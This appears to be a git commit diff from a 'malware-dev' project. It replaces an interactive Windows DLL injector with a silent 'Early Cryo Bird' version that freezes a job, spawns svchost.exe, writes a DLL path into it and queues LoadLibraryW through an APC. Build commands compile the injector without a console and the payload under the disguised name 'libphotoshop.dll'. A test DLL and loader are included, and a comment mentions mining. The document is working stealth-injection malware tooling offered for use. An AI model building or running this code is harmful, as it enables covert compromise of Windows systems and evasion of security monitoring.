initial commit

.gitignore

@@ -0,0 +1 @@
+*.exe

Early-Cryo-Bird- DLL-Injection.cpp

@@ -1,250 +0,0 @@
-#define _CRT_SECURE_NO_WARNINGS
-
-#include <Windows.h>
-#include <winternl.h>
-#include <iostream>
-
-#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
-#define JobObjectFreezeInformation 18
-
-typedef const OBJECT_ATTRIBUTES* PCOBJECT_ATTRIBUTES;
-
-// Typedef NT-functions
-typedef NTSTATUS(NTAPI* pNtQueueApcThread)(HANDLE, PVOID, PVOID, PVOID, PVOID);
-typedef NTSTATUS(NTAPI* pNtWriteVirtualMemory)(HANDLE, PVOID, PVOID, ULONG, PULONG);
-typedef NTSTATUS(NTAPI* pNtAllocateVirtualMemoryEx)(HANDLE, PVOID*, PSIZE_T, ULONG, ULONG, PVOID, ULONG);
-typedef NTSTATUS(NTAPI* pSetInformationJobObject)(HANDLE, JOBOBJECTINFOCLASS, PVOID, ULONG);
-typedef NTSTATUS(NTAPI* pNtCreateJobObject)(PHANDLE, ACCESS_MASK, PCOBJECT_ATTRIBUTES);
-typedef NTSTATUS(NTAPI* pNtWaitForSingleObject)(HANDLE, BOOLEAN, PLARGE_INTEGER);
-
-HMODULE hNtDll = GetModuleHandleA("ntdll.dll");
-
-const char pAddress[] = "LoadLibraryW";
-
-pNtQueueApcThread NtQueueApcThread = (pNtQueueApcThread)GetProcAddress(hNtDll, "NtQueueApcThread");
-pNtWriteVirtualMemory NtWriteVirtualMemory = (pNtWriteVirtualMemory)GetProcAddress(hNtDll, "NtWriteVirtualMemory");
-pNtAllocateVirtualMemoryEx NtAllocateVirtualMemoryEx = (pNtAllocateVirtualMemoryEx)GetProcAddress(hNtDll, "NtAllocateVirtualMemoryEx");
-pSetInformationJobObject NtSetInformationJobObject = (pSetInformationJobObject)GetProcAddress(hNtDll, "NtSetInformationJobObject");
-pNtCreateJobObject NtCreateJobObject = (pNtCreateJobObject)GetProcAddress(hNtDll, "NtCreateJobObject");
-pNtWaitForSingleObject NttWaitForSingleObject = (pNtWaitForSingleObject)GetProcAddress(hNtDll, "NtWaitForSingleObject");
-
-
-// JOBOBJECT_FREEZE_INFORMATION
-typedef struct _JOBOBJECT_WAKE_FILTER {
-    ULONG HighEdgeFilter;
-    ULONG LowEdgeFilter;
-} JOBOBJECT_WAKE_FILTER, * PJOBOBJECT_WAKE_FILTER;
-
-typedef struct _JOBOBJECT_FREEZE_INFORMATION {
-    union {
-        ULONG Flags;
-        struct {
-            ULONG FreezeOperation : 1;
-            ULONG FilterOperation : 1;
-            ULONG SwapOperation : 1;
-            ULONG Reserved : 29;
-        };
-    };
-    BOOLEAN Freeze;
-    BOOLEAN Swap;
-    UCHAR Reserved0[2];
-    JOBOBJECT_WAKE_FILTER WakeFilter;
-} JOBOBJECT_FREEZE_INFORMATION, * PJOBOBJECT_FREEZE_INFORMATION;
-
-void SetColor(int color) {
-    HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE);
-    SetConsoleTextAttribute(hConsole, color);
-}
-
-int main()
-{
-    
-    const wchar_t dllPath[] = L"C:\\Users\\sample.dll";
-    SIZE_T dllPathLen = sizeof(dllPath);
-    SIZE_T regionSize = dllPathLen;
-
-    HANDLE hJob = NULL;
-
-    NTSTATUS creationJob = NtCreateJobObject(&hJob, STANDARD_RIGHTS_ALL | 63, NULL);
-    if (!NT_SUCCESS(creationJob)) {
-        SetColor(FOREGROUND_RED);
-        printf("Error: 0x%X\n", creationJob);
-        CloseHandle(hJob);
-        return -1;
-    }
-
-
-    JOBOBJECT_FREEZE_INFORMATION freezeInfo = { 0 };
-    freezeInfo.FreezeOperation = 1; // Initiate freeze
-    freezeInfo.Freeze = TRUE;
-
-    NTSTATUS freezeStatus = NtSetInformationJobObject(hJob, (JOBOBJECTINFOCLASS)JobObjectFreezeInformation, &freezeInfo, sizeof(freezeInfo));
-    if (!NT_SUCCESS(freezeStatus)) {
-        SetColor(FOREGROUND_RED);
-        printf("Error: 0x%X\n", freezeStatus);
-        CloseHandle(hJob);
-        return -1;
-    }
-
-
-    STARTUPINFOEXW siEx = { 0 };
-    siEx.StartupInfo.cb = sizeof(siEx);
-    SIZE_T attrListSize = 0;
-
-    InitializeProcThreadAttributeList(NULL, 1, 0, &attrListSize);
-    siEx.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attrListSize);
-    if (!siEx.lpAttributeList) {
-        printf("Error in the attribute list allocation.\n");
-        CloseHandle(hJob);
-        return -1;
-    }
-    if (!InitializeProcThreadAttributeList(siEx.lpAttributeList, 1, 0, &attrListSize)) {
-        std::cerr << "Error initialising the attribute list. Error: " << GetLastError() << std::endl;
-        HeapFree(GetProcessHeap(), 0, siEx.lpAttributeList);
-        CloseHandle(hJob);
-        return -1;
-    }
-    // Enter the job object in the attribute list
-    if (!UpdateProcThreadAttribute(
-        siEx.lpAttributeList,
-        0,
-        PROC_THREAD_ATTRIBUTE_JOB_LIST,
-        &hJob,
-        sizeof(HANDLE),
-        NULL,
-        NULL))
-    {
-        std::cerr << "Error updating the attribute list. Error: " << GetLastError() << std::endl;
-        DeleteProcThreadAttributeList(siEx.lpAttributeList);
-        HeapFree(GetProcessHeap(), 0, siEx.lpAttributeList);
-        CloseHandle(hJob);
-        return -1;
-    }
-
-    // Create process in the job (e.g. dllhost.exe)
-    PROCESS_INFORMATION pi = { 0 };
-    if (!CreateProcessW(
-        L"C:\\Windows\\System32\\dllhost.exe",
-        NULL,
-        NULL,
-        NULL,
-        FALSE,
-        EXTENDED_STARTUPINFO_PRESENT,
-        NULL,
-        NULL,
-        &siEx.StartupInfo,
-        &pi))
-    {
-        std::cerr << "CreateProcessW failed: " << GetLastError() << std::endl;
-        DeleteProcThreadAttributeList(siEx.lpAttributeList);
-        HeapFree(GetProcessHeap(), 0, siEx.lpAttributeList);
-        CloseHandle(hJob);
-        return -1;
-    }
-    std::cout << "[+] Started Process in Job! PID: " << pi.dwProcessId << std::endl;
-
-  
-
-    // Release attribute list
-    DeleteProcThreadAttributeList(siEx.lpAttributeList);
-    HeapFree(GetProcessHeap(), 0, siEx.lpAttributeList);
-
-    PVOID remoteMemory = NULL;
-
-    // Allocate memory in the target process | PAGE_READWRITE is sufficient for the DLL path
-    NTSTATUS allocStatus = NtAllocateVirtualMemoryEx(pi.hProcess, &remoteMemory, &regionSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE, NULL, 0);
-    if (NT_SUCCESS(allocStatus)) {
-        SetColor(FOREGROUND_GREEN);
-        printf("[+] NtAllocateVirtualMemoryEx allocated memory at 0x%p\n", remoteMemory);
-    }
-    else {
-        SetColor(FOREGROUND_RED);
-        printf("Error: 0x%X\n", allocStatus);
-        CloseHandle(hJob);
-        CloseHandle(pi.hThread);
-        CloseHandle(pi.hProcess);
-        return -1;
-    }
-
-
-    // Write the DLL path to the allocated memory
-    NTSTATUS writeStatus = NtWriteVirtualMemory(pi.hProcess, remoteMemory, (PVOID)dllPath, dllPathLen, NULL);
-    if (NT_SUCCESS(writeStatus)) {
-        SetColor(FOREGROUND_GREEN);
-        printf("[+] DLL path was written to 0x%p\n", remoteMemory);
-    }
-    else {
-        SetColor(FOREGROUND_RED);
-        printf("Error: 0x%X\n", writeStatus);
-        CloseHandle(hJob);
-        CloseHandle(pi.hThread);
-        CloseHandle(pi.hProcess);
-        return 1;
-    }
-
-
-    HMODULE hKernel32 = GetModuleHandleW(L"kernel32.dll");
-    if (hKernel32 == NULL) {
-        SetColor(FOREGROUND_RED);
-        printf("[-] Error retrieving Kernel32-Module\n");
-        CloseHandle(hJob);
-        CloseHandle(pi.hThread);
-        CloseHandle(pi.hProcess);
-        return -1;
-    }
-
-    
-    FARPROC loadLibAddr = GetProcAddress(hKernel32, pAddress);
-    if (!loadLibAddr) {
-        printf("Error retrieving the address of LoadLibraryW.\n");
-        CloseHandle(hJob);
-        CloseHandle(pi.hThread);
-        CloseHandle(pi.hProcess);
-        return -1;
-    }
-    if (!NT_SUCCESS(NtQueueApcThread(pi.hThread, (PVOID)loadLibAddr, remoteMemory, NULL, NULL))) {
-        printf("NtQueueApcThread failed...\n");
-        CloseHandle(hJob);
-        CloseHandle(pi.hThread);
-        CloseHandle(pi.hProcess);
-        return -1;
-    }
-    SetColor(FOREGROUND_INTENSITY);
-    printf("[+] APC has been successfully installed. The DLL is loaded during defrosting.\n");
-
-    printf("Press enter for thawing...\n");
-    getchar();
-
-
-    
-    freezeInfo.FreezeOperation = 1; // Unfreeze operation
-    freezeInfo.Freeze = FALSE;
-
-
-    NTSTATUS unfreezeStatus = NtSetInformationJobObject(hJob, (JOBOBJECTINFOCLASS)JobObjectFreezeInformation, &freezeInfo, sizeof(freezeInfo));
-    if (!NT_SUCCESS(unfreezeStatus)) {
-        SetColor(FOREGROUND_RED);
-        printf("Error: 0x%X\n", unfreezeStatus);
-        CloseHandle(hJob);
-        return -1;
-    }
-
-    SetColor(FOREGROUND_BLUE);
-    printf("Process thawed successfully!\n");
-
-    NTSTATUS waitForSingleObjectStatus = NttWaitForSingleObject(pi.hProcess, TRUE, NULL);
-    if (!NT_SUCCESS(waitForSingleObjectStatus)) {
-        SetColor(FOREGROUND_RED);
-        printf("Error: 0x%X\n", waitForSingleObjectStatus);
-        return -1;
-    }
-
-
-    // WaitForSingleObject(pi.hProcess, 0xFFFFFFFF);
-
-    CloseHandle(hJob);
-    CloseHandle(pi.hThread);
-    CloseHandle(pi.hProcess);
-
-    return 0;
-}

build_cmd

@@ -0,0 +1,14 @@
+x86_64-w64-mingw32-g++ -o injector.exe early-cryo-bird-DLL-injection-stealth.cpp -static -lpsapi -lntdll -Wl,--subsystem,windows -mwindows
+
+
+x86_64-w64-mingw32-g++ \
+          -shared \
+          -o libphotoshop.dll test_injector.cpp \
+          -static-libgcc -static-libstdc++ -static \
+          -fno-exceptions -fno-rtti \
+          -D_WIN32_WINNT=0x0601 \
+          -Wl,--major-subsystem-version,6 \
+          -Wl,--minor-subsystem-version,1 \
+          -Os -s
+
+x86_64-w64-mingw32-g++ -o test_load.exe test_load.cpp -static-libgcc -static-libstdc++ -Os -s

early-cryo-bird-DLL-injection-stealth.cpp

@@ -0,0 +1,86 @@
+// Early-Cryo-Bird-DLL-Injection.cpp — FULLY SILENT & INSTANT (2025)
+// No console output, no getchar(), no user input required
+
+#define _CRT_SECURE_NO_WARNINGS
+#include <windows.h>
+#include <winternl.h>
+#include <iostream>
+
+#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
+#define JobObjectFreezeInformation 18
+
+typedef const OBJECT_ATTRIBUTES* PCOBJECT_ATTRIBUTES;
+
+typedef NTSTATUS(NTAPI* pNtQueueApcThread)(HANDLE, PVOID, PVOID, PVOID, PVOID);
+typedef NTSTATUS(NTAPI* pNtWriteVirtualMemory)(HANDLE, PVOID, PVOID, ULONG, PULONG);
+typedef NTSTATUS(NTAPI* pNtAllocateVirtualMemoryEx)(HANDLE, PVOID*, PSIZE_T, ULONG, ULONG, PVOID, ULONG);
+typedef NTSTATUS(NTAPI* pSetInformationJobObject)(HANDLE, JOBOBJECTINFOCLASS, PVOID, ULONG);
+typedef NTSTATUS(NTAPI* pNtCreateJobObject)(PHANDLE, ACCESS_MASK, PCOBJECT_ATTRIBUTES);
+
+HMODULE hNtDll = GetModuleHandleA("ntdll.dll");
+
+pNtQueueApcThread NtQueueApcThread = (pNtQueueApcThread)GetProcAddress(hNtDll, "NtQueueApcThread");
+pNtWriteVirtualMemory NtWriteVirtualMemory = (pNtWriteVirtualMemory)GetProcAddress(hNtDll, "NtWriteVirtualMemory");
+pNtAllocateVirtualMemoryEx NtAllocateVirtualMemoryEx = (pNtAllocateVirtualMemoryEx)GetProcAddress(hNtDll, "NtAllocateVirtualMemoryEx");
+pSetInformationJobObject NtSetInformationJobObject = (pSetInformationJobObject)GetProcAddress(hNtDll, "NtSetInformationJobObject");
+pNtCreateJobObject NtCreateJobObject = (pNtCreateJobObject)GetProcAddress(hNtDll, "NtCreateJobObject");
+
+typedef struct _JOBOBJECT_FREEZE_INFORMATION {
+    union { ULONG Flags; struct { ULONG FreezeOperation : 1; ULONG FilterOperation : 1; ULONG SwapOperation : 1; ULONG Reserved : 29; }; };
+    BOOLEAN Freeze;
+    BOOLEAN Swap;
+    UCHAR Reserved0[2];
+    struct { ULONG HighEdgeFilter; ULONG LowEdgeFilter; } WakeFilter;
+} JOBOBJECT_FREEZE_INFORMATION, *PJOBOBJECT_FREEZE_INFORMATION;
+
+int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int) {
+    // FULLY SILENT — no console
+    const wchar_t dllPath[] = L"C:\\Users\\MyWindowsUser\\Downloads\\libphotoshop.dll";
+    SIZE_T dllPathLen = sizeof(dllPath);
+    SIZE_T regionSize = dllPathLen;
+
+    HANDLE hJob = NULL;
+    NtCreateJobObject(&hJob, MAXIMUM_ALLOWED, NULL);
+
+    JOBOBJECT_FREEZE_INFORMATION freezeInfo = { 0 };
+    freezeInfo.FreezeOperation = 1;
+    freezeInfo.Freeze = TRUE;
+    NtSetInformationJobObject(hJob, (JOBOBJECTINFOCLASS)JobObjectFreezeInformation, &freezeInfo, sizeof(freezeInfo));
+
+    STARTUPINFOEXW siEx = { sizeof(siEx) };
+    SIZE_T attrListSize = 0;
+    InitializeProcThreadAttributeList(NULL, 1, 0, &attrListSize);
+    siEx.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attrListSize);
+    InitializeProcThreadAttributeList(siEx.lpAttributeList, 1, 0, &attrListSize);
+    UpdateProcThreadAttribute(siEx.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_JOB_LIST, &hJob, sizeof(HANDLE), NULL, NULL);
+
+    PROCESS_INFORMATION pi = { 0 };
+    CreateProcessW(
+        L"C:\\Windows\\System32\\svchost.exe",  // or dllhost.exe / notepad.exe
+        NULL, NULL, NULL, FALSE,
+        CREATE_SUSPENDED | EXTENDED_STARTUPINFO_PRESENT,
+        NULL, NULL, (STARTUPINFOW*)&siEx, &pi
+    );
+
+    DeleteProcThreadAttributeList(siEx.lpAttributeList);
+    HeapFree(GetProcessHeap(), 0, siEx.lpAttributeList);
+
+    PVOID remoteMemory = NULL;
+    NtAllocateVirtualMemoryEx(pi.hProcess, &remoteMemory, &regionSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE, NULL, 0);
+    NtWriteVirtualMemory(pi.hProcess, remoteMemory, (PVOID)dllPath, dllPathLen, NULL);
+
+    FARPROC loadLibAddr = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "LoadLibraryW");
+    NtQueueApcThread(pi.hThread, (PVOID)loadLibAddr, remoteMemory, NULL, NULL);
+
+    // INSTANT UNFREEZE — no user input
+    freezeInfo.Freeze = FALSE;
+    NtSetInformationJobObject(hJob, (JOBOBJECTINFOCLASS)JobObjectFreezeInformation, &freezeInfo, sizeof(freezeInfo));
+
+    ResumeThread(pi.hThread);  // optional: resume main thread (not needed for mining)
+
+    CloseHandle(hJob);
+    CloseHandle(pi.hThread);
+    CloseHandle(pi.hProcess);
+
+    return 0;
+}

extractions/svchost.exe_2025-12-11_20-10-21.dmp

@@ -0,0 +1 @@
+/home/someone/malware-dev/Early-Cryo-Bird-Injections/svchost.exe_2025-12-11_20-10-21.dmp

test_injector.cpp

@@ -0,0 +1,26 @@
+// test.cpp → compile as test.dll (x64, Release)
+#include <windows.h>
+#include <iostream>
+#include <fstream>
+
+BOOL APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID lpReserved)
+{
+    if (reason == DLL_PROCESS_ATTACH) {
+        DisableThreadLibraryCalls(hModule);
+
+        // 1. MessageBox = instant visible proof
+        MessageBoxA(NULL, "DLL INJECTED & DLLMAIN RAN!", "SUCCESS", MB_ICONINFORMATION);
+
+        // 2. Drop a file so you can see it even if no GUI
+        std::ofstream out("C:\\Users\\MyWindowsUser\\AppData\\Local\\Temp\\AREYOUWORKING.txt");
+        out << "DLL loaded at " << GetTickCount64() << " into PID " << GetCurrentProcessId() << std::endl;
+        out.close();
+
+        // 3. Keep process alive (critical!)
+        CreateThread(NULL, 0, [](LPVOID) -> DWORD {
+            for (;;) Sleep(60000);
+            return 0;
+        }, nullptr, 0, nullptr);
+    }
+    return TRUE;
+}

test_load.cpp

@@ -0,0 +1,14 @@
+#include <windows.h>
+#include <cstdio>
+int main() {
+    HMODULE h = LoadLibraryA("C:\\Users\\MyWindowsUser\\Downloads\\libphotoshop.dll");
+    if (!h) {
+        char buf[256];
+        sprintf(buf, "Load failed: Error %lu", GetLastError());
+        MessageBoxA(NULL, buf, "FAIL", MB_ICONERROR);
+    } else {
+        MessageBoxA(NULL, "DLL LOADED OK!", "SUCCESS", MB_ICONINFORMATION);
+    }
+    Sleep(10000);  // Keep open to see
+    return 0;
+}